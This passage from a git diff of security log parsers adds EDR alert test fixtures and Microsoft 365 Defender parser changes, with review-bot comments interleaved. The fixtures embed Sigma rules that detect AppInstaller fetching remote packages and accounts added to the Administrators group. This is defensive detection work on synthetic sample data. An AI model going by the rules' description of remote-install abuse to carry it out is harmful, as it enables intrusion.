https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\",\"aggregation_key\":\"1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c\",\"threat_type\":\"commandline\",\"threat_values\":[\":\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}",
+ "event": {
+ "category": [
+ "process"
+ ],
+ "dataset": "alert",
+ "kind": "alert",
+ "type": [
+ "start"
+ ]
+ },
+ "@timestamp": "2024-11-18T09:18:31.558000Z",
+ "agent": {
+ "id": "11111111-aaaa-bbbb-cccc-222222222222",
+ "name": "harfanglab"
+ },
+ "file": {
+ "hash": {
+ "md5": "b4e821b2dac20d8d2ac6889f9c3fc315",
+ "sha1": "a53b060cfb5e23508b4f9658d904cd7cb659de7f",
+ "sha256": "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45"
+ }
+ },
+ "harfanglab": {
+ "aggregation_key": "1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c",
+ "alert_subtype": "process",
+ "alert_time": "2024-11-18T09:18:31.852+00:00",
+ "alert_unique_id": "11111111-2222-3333-4444-555555555555",
+ "execution": 0,
+ "groups": [
+ "{\"id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"name\": \"DOMAIN_Postes_de_travail_Windows\"}"
+ ],
+ "level": "medium",
+ "status": "new"
+ },
+ "host": {
+ "domain": "DOMAINSI",
+ "hostname": "HOST01",
+ "name": "HOST01",
+ "os": {
+ "full": "Windows 10 Pro",
+ "version": "10.0.19045"
+ }
+ },
+ "log": {
+ "hostname": "HOST01"
+ },
+ "process": {
+ "command_line": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca",
+ "executable": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe",
+ "name": "AppInstaller.exe",
+ "parent": {
+ "command_line": "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p",
+ "executable": "C:\\Windows\\System32\\svchost.exe"
+ },
+ "pe": {
+ "company": "Microsoft Corporation",
+ "description": "AppInstaller.exe",
+ "file_version": "1.24.25180.00000",
+ "imphash": "714FD4ADFC932C947A3949463867BE18",
+ "original_file_name": "AppInstaller.exe",
+ "product": "Microsoft Desktop App Installer"
+ },
+ "pid": 20188,
+ "working_directory": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\"
+ },
+ "related": {
+ "hash": [
+ "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45",
+ "a53b060cfb5e23508b4f9658d904cd7cb659de7f",
+ "b4e821b2dac20d8d2ac6889f9c3fc315"
+ ],
+ "hosts": [
+ "HOST01"
+ ],
+ "user": [
+ "DOMAINSI\\JDOE"
+ ]
+ },
+ "rule": {
+ "category": "sigma",
+ "description": "Detects URL requests performed by AppInstaller in order to install a remote application.\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\n",
+ "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
+ "name": "Package Installed via AppInstaller from the Internet"
+ },
+ "url": {
+ "domain": "url.integration.com",
+ "original": "https://url.integration.com/test",
+ "path": "/test",
+ "port": 443,
+ "registered_domain": "integration.com",
+ "scheme": "https",
+ "subdomain": "url",
+ "top_level_domain": "com"
+ },
+ "user": {
+ "name": "DOMAINSI\\JDOE",
+ "roles": "DOMAIN_Postes_de_travail_Windows"
+ }
+ }
+}
\ No newline at end of file
diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json
new file mode 100644
index 000000000..19abfe567
--- /dev/null
+++ b/HarfangLab/harfanglab/tests/alert_5.json
@@ -0,0 +1,89 @@ +{ + "input": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the 
Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": 
\"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: 
S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate 
administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local 
Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}",
+ "event": {
+ "dataset": "alert",
+ "kind": "alert",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-11-12T08:39:14.017000Z",
+ "action": {
+ "properties": {
+ "MemberName": "DOEJ",
+ "SubjectDomainName": "NT_DOMAIN",
+ "SubjectLogonId": "0x1234567",
+ "SubjectUserName": "sw-suser",
+ "SubjectUserSid": "S-1-2-4-5-6",
+ "TargetDomainName": "Builtin",
+ "TargetSid": "S-1-2-3-4",
+ "TargetUserName": "Administrateurs"
+ }
+ },
+ "agent": {
+ "id": "11111111-aaaa-2222-bbbb-333333333333",
+ "name": "harfanglab"
+ },
+ "harfanglab": {
+ "aggregation_key": "8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb",
+ "alert_subtype": "eventlog",
+ "alert_time": "2024-11-12T08:39:14.017+00:00",
+ "alert_unique_id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc",
+ "execution": 0,
+ "groups": [
+ "{\"id\": \"11111111-2222-3333-4444-555555555555\", \"name\": \"Postes de travail\"}",
+ "{\"id\": \"66666666-7777-8888-9999-000000000000\", \"name\": \"Postes de travail : Lot 3\"}"
+ ],
+ "level": "medium",
+ "status": "new"
+ },
+ "host": {
+ "domain": "NT_DOMAIN",
+ "hostname": "PC01",
+ "name": "PC01",
+ "os": {
+ "full": "Windows 10 Enterprise",
+ "version": "10.0.19045"
+ }
+ },
+ "log": {
+ "hostname": "PC01"
+ },
+ "organization": {
+ "id": "3b37ffc8520ef542"
+ },
+ "related": {
+ "hosts": [
+ "PC01"
+ ],
+ "user": [
+ "sw-suser"
+ ]
+ },
+ "rule": {
+ "category": "sigma",
+ "description": "Detects when a user account is added into the local Administrators group.\n This action can be the result of a malicious activity.",
+ "id": "12345678-abcd-ef90-1234-123456abcdef",
+ "name": "User Account Added to the Local Administrators Group"
+ },
+ "user": {
+ "domain": "NT_DOMAIN",
+ "name": "sw-suser",
+ "roles": "Postesdetravail,Postesdetravail:Lot3",
+ "target": {
+ "domain": "Builtin",
+ "name": "Administrateurs"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml
index f69ef372d..c92ffb8db 100644
--- a/Microsoft/microsoft-365-defender/_meta/fields.yml
+++ b/Microsoft/microsoft-365-defender/_meta/fields.yml
@@ -821,6 +821,16 @@ microsoft.defender.threat.types:
 name: microsoft.defender.threat.types
 type: keyword
+process.parent.user.domain:
+ description: ''
+ name: process.parent.user.domain
+ type: keyword
+
+process.parent.user.email:
+ description: ''
+ name: process.parent.user.email
+ type: keyword
+
 process.user.domain:
 description: Domain of the account that ran the process responsible for the event
 name: process.user.domain
diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
index 21e3caf3c..2d1728daa 100644
--- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
+++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
@@ -1,4 +1,25 @@
 [
+ {
+ "value": "A new {action.type} cloud app event have been received",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "cloud_app_events"
+ },
+ { "field": "action.type" }
+ ]
+ },
+ {
+ "value": "New {action.type} incident received: {microsoft.defender.investigation.name}",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "cloud_app_events"
+ },
+ { "field": "action.type" },
+ { "field": "microsoft.defender.investigation.name" }
+ ]
+ },
 {
 "value": "New incident {microsoft.defender.investigation.name}: {email.attachments.file.name} with hash {email.attachments.file.hash.sha256}",
 "conditions": [
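Review bot: The expected `user.roles` value `"Postesdetravail,Postesdetravail:Lot3"` pins a lossy transform: the group names `Postes de travail` and `Postes de travail : Lot 3` from the input lose their spaces and are joined into one string, whereas ECS `user.roles` is a keyword array and the preceding HarfangLab fixture in this diff keeps its single group name intact. I would expect `"roles": ["Postes de travail", "Postes de travail : Lot 3"]` here and fix the parser rather than enshrine the current output. Separately, `related.user` only carries the subject `sw-suser`; the account added to the local Administrators group (`MemberName`, reduced to `DOEJ` in `action.properties`) is the value an analyst pivots on for a 4732 and should be in `related.user` as well. The fixture also has no `event.category`; for a group-membership change, `iam` with `event.type` `group`/`change` describes it better than `info`.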
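Review bot: Both new field definitions, `process.parent.user.domain` and `process.parent.user.email`, are added with `description: ''`, while the neighbouring `process.user.domain` entry documents its meaning. This file is what surfaces in the field reference, so fill them in along the same lines, e.g. `description: Domain of the account that ran the parent of the process responsible for the event` and `description: Email (UPN) of the account that ran the parent of the process responsible for the event`; the exact source column these are mapped from is set in a stage outside this chunk, so adjust the wording if it differs.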
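Review bot: The first new template reads `A new {action.type} cloud app event have been received`; the subject is singular, so it should be `has been received`. The second entry, `New {action.type} incident received: {microsoft.defender.investigation.name}`, is also gated on `event.dataset` = `cloud_app_events`, which looks like a copied condition block: if incidents arrive under another dataset this template never fires, and if they do arrive under `cloud_app_events` the less specific first entry is listed ahead of it, so check which entry wins when both match and, if needed, move the more specific one first.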
@@ -132,6 +153,35 @@
 }
 ]
 },
+ {
+ "value": "{user.domain}\\{user.name} failed to log on {host.name}",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "device_logon_events"
+ },
+ {
+ "field": "host.name"
+ },
+ {
+ "field": "user.name"
+ },
+ {
+ "field": "user.domain"
+ },
+ {
+ "field": "action.type",
+ "value": "LogonFailed"
+ }
+ ],
+ "relationships": [
+ {
+ "source": "user.name",
+ "target": "host.name",
+ "type": "logged on"
+ }
+ ]
+ },
 {
 "value": "{user.domain}\\{user.name} logged on {host.name}",
 "conditions": [
@@ -402,6 +452,28 @@
 { "field": "email.to.address" }
 ]
 },
+ {
+ "value": "{event.action} email from {email.from.address} to {email.to.address}",
+ "conditions": [
+ { "field": "event.dataset", "value": "email_events" },
+ { "field": "email.from.address" },
+ { "field": "email.to.address" }
+ ]
+ },
+ {
+ "value": "{event.action} email from {email.from.address}",
+ "conditions": [
+ { "field": "event.dataset", "value": "email_events" },
+ { "field": "email.from.address" }
+ ]
+ },
+ {
+ "value": "{event.action} email to {email.to.address}",
+ "conditions": [
+ { "field": "event.dataset", "value": "email_events" },
+ { "field": "email.to.address" }
+ ]
+ },
 {
 "value": "{action.type} on {url.original}",
 "conditions": [
diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index 2a8b6655f..d212bdb11 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
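Review bot: The new `failed to log on` entry declares a relationship of type `logged on` between `user.name` and `host.name`, which asserts the opposite of what the template says. The `LogonFailed` branch should emit `"type": "failed to log on"`, the pattern the winlogbeat 4625 descriptions use, so that graph consumers do not record a failed attempt as an established session.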
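Review bot: The three email templates interpolate `{event.action}` but none of them lists `event.action` in `conditions`, so an `email_events` record with no action renders as ` email from …` with a dangling blank. Add `{ "field": "event.action" }` to each of the three condition lists; the most-specific-first order (from+to, from, to) is the right one if matching is first-hit.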
@@ -40,6 +40,10 @@ pipeline:
 input_field: "{{json_event.message.properties.RawEventData.Data}}"
 output_field: "data"
 - name: set_common_fields
+ - name: set_process_events
+ filter: '{{json_event.message.get("category") != "AdvancedHunting-DeviceProcessEvents"}}'
+ - name: set_process_deviceprocess_events
+ filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents"}}'
 - name: set_alert_evidence_fields
 filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}'
 - name: set_alert_info_fields
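Review bot: The two routing filters are complementary on `category`, but `json_event.message.get("category")` yields None when the key is absent and `None != "AdvancedHunting-DeviceProcessEvents"` is true, so any message without a `category` is routed through `set_process_events`; if that is not intended, require the key too, e.g. `filter: '{{json_event.message.get("category") and json_event.message.get("category") != "AdvancedHunting-DeviceProcessEvents"}}'`. The bodies of `set_process_events` and `set_process_deviceprocess_events` are outside this hunk, so I could not check that every `process.*` and `process.args` mapping removed from `set_common_fields` below is re-emitted by them; worth a fixture that covers both a DeviceProcessEvents and a non-DeviceProcessEvents record.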
@@ -126,22 +130,6 @@ stages:
 host.os.full: "{{json_event.message.properties.OSPlatform}}"
 host.os.version: "{{json_event.message.properties.OSVersion}}"
 host.type: "{{json_event.message.properties.DeviceType}}"
- process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}"
- process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}"
- process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}"
- process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}"
- process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}"
- process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}"
- process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}"
- process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
- process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
- process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
- process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
- process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
- process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
- process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}"
- process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}"
- process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}"
 registry.data.type: "{{json_event.message.properties.RegistryValueType}}"
 registry.key: "{{json_event.message.properties.RegistryKey}}"
 registry.value: "{{json_event.message.properties.RegistryValueName}}"
@@ -166,18 +154,6 @@ stages: action.properties.FileOriginReferrerUrl: "{{json_event.message.properties.FileOriginReferrerUrl}}" action.properties.FileOriginUrl: "{{json_event.message.properties.FileOriginUrl}}" action.properties.ISP: "{{json_event.message.properties.ISP or json_event.message.properties.Isp}}" - action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" - action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" - action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" - action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" - action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" - action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" - action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" - action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" - action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" - action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" - action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" - action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" action.properties.LocalIPType: "{{json_event.message.properties.LocalIPType}}" action.properties.Location: 
"{{json_event.message.properties.Location}}" action.properties.LogonId: "{{json_event.message.properties.LogonId}}" @@ -250,12 +226,6 @@ stages: - set: user.roles: '["{{json_event.message.properties.AccountType}}"]' filter: '{{json_event.message.properties.get("AccountType")}}' - - set: - process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' - filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 0}}' - - set: - process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' - filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 0}}' - set: network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}" filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}' 
@@ -274,6 +244,99 @@ stages: } filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}' + set_process_events: + actions: + - set: + process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" + process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" + process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" + process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}" + process.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}" + process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" + process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}" + process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" + process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" + process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" + process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" + process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" + process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" + process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" + process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" + process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" + 